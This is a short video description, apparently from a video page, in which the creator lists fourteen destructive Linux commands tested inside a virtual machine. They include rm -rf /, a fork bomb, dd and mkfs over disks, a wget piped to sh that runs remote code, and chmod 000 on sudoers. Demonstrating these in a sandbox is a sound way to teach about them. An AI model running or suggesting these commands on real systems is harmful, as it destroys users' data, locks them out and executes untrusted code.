Me Destroying VMs With Different Linux Commands
This is a video where I test out a number of dangerous and destructive Linux commands in a virtual machine to see what happens. The commands are as follows. (The description dose not allow some characters and these characters are substituted with the name in quotes)
1. rm -rf /
2. :(){:|: &};:
3. mkfs.ext4 /dev/sda1
4. date "Grater than" /dev/sda
5. dd if=/dev/random of=/dev/sda
6. mv ~ /dev/null
7. wget http://example.com/something -O - | sh -
8. kill -9 -1
9. ccencrypt -rf /
10. PATH=!(/any/other/directory)
11. chattr -R +i /
12. exec "Grater than" /dev/null
13. sudo tail -f /dev/zero "Double Grater Than" /var/log/bomb.log
14. sudo chmod 000 /etc/sudoers
